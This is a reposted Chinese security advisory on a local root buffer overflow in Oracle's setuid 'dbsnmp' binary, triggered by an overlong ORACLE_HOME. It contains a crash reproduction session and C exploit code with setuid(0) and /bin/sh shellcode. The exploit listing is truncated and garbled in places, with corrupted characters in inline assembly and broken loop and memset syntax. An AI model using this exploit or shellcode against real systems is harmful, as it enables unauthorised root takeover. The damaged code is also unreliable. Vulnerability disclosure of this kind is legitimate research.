oracle‘dbsnmp’缓冲区溢出漏洞

2008-04-09 04:27:57来源：互联网阅读 ()

oracle‘dbsnmp’缓冲区溢出漏洞

发布日期：2001-08-02
更新日期：2001-08-03

受影响系统：

Oracle 8.1.6
Oracle 8.1.7
Oracle 9i
- Linux

描述：

Oracle 8.1.6/7所带的'dbsnmp'程序缺省设置了setuid root属性。这个程序在处理环境
变量ORACLE_HOME时，没有进行有效的边界检查，如果将其设置为超过749字节长的字符串。
攻击者就可以引发一个缓冲区溢出。通过覆盖内存中的敏感数据，攻击者可以获取root权限。

由于缺省安装时，'dbsnmp'只允许'oinstall'组用户执行，因此攻击者必须首先获取'oinstall'
组权限才可以提升权限。

<*来源：Juan Manuel Pascual (pask@plazasite.com) *>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Juan Manuel Pascual (pask@plazasite.com)提供了如下测试代码：

[oracle@proves1 iAS]$ ls -alc
/usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp
-rwsr-s--- 1 root oinstall 667874 jul 18 15:38
/usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp

[oracle@proves1 8.1.6]$ export ORACLE_HOME=`perl -e 'print "A"x749'`
[oracle@proves1 8.1.6]$
/usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462
Failed to initialize nl component,error=462

[oracle@proves1 8.1.6]$[oracle@proves1 8.1.6]$ export ORACLE_HOME=`perl
-e 'print "A"x750'`
[oracle@proves1 8.1.6]$ dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Segmentation fault

这个缓冲区溢出在Oracle 9i中也存在：

[oracle@proves1 iAS]$ ls -alc
/usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp
-rwsr-s--- 1 root oinstall 971665 abr 11 17:41
/usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp

[oracle@proves1 iAS]$ export ORACLE_HOME=`perl -e 'print "A"x749'`
[oracle@proves1 iAS]$
/usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462

[oracle@proves1 iAS]$ Failed to initialize nl component,error=462
[oracle@proves1 iAS]$ export ORACLE_HOME=`perl -e 'print "A"x750'`
[oracle@proves1 iAS]$
/usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp
Segmentation fault

/* Exploit code for dbsnmp binary in Oracle 8.1.6.0.0 Linux Platform. I tested
it in RH 6.2.

dbsnmp makes setresuid(,getuid(),) before reading ORACLE_HOME environment
variable. Its necessary to call setuid(0) before normal shellcode.

In My tests Offset may vary from 7846 to 7896. Its posible to obtain a normal
(uid=oracle) shell for low offsets (incomplete setuid(0) jumps).

"Cae fuego en lugar de mana
Se disfraza el asfalto de mar
El zapato no encuentra el pedal
Parece que anda suelto satanas."

L.E.Aute

This vulnerability was researched by:
Juan Manuel Pascual <pask@plazasite.com>

Special thanks to:

Ivan Sanchez <isanchez@plazasite.com>
Mundo Alonso-Cuevillas <mundo@plazasite.com>
*/

#include <stdio.h>
#include <stdlib.h>

#define BUFFER 800
#define OFFSET 7896
#define NOP 0x90
#define BINARY "/usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp"

char shellcode[] =
"\x90" /* Additional NOP */
"\x31\xc0" /* begin setuid (0) */
"\x31\xdb"
"\xb0\x17"
"\xcd\x80"

"\xeb\x1f"
"\x5e"
"\x89\x76\x08"
"\x31\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\xb0\x0b"
"\x89\xf3"
"\x8d\x4e\x08"
"\x8d\x56\x0c"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\x40"
"\xcd\x80"
"\xe8\xdc\xff\xff\xff"
"/bin/sh";

unsigned long get_sp(void) {
__asm__("movl %esp,陎");
}

void main(int argc, char *argv[]) {
char *buff, *ptr,binary[120];
long *addr_ptr, addr;
int bsize=BUFFER;
int i,offset=OFFSET;

if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}

addr = get_sp() -offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i =4)
*(addr_ptr ) = addr;

memset(buff,bsize/2,NOP);

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有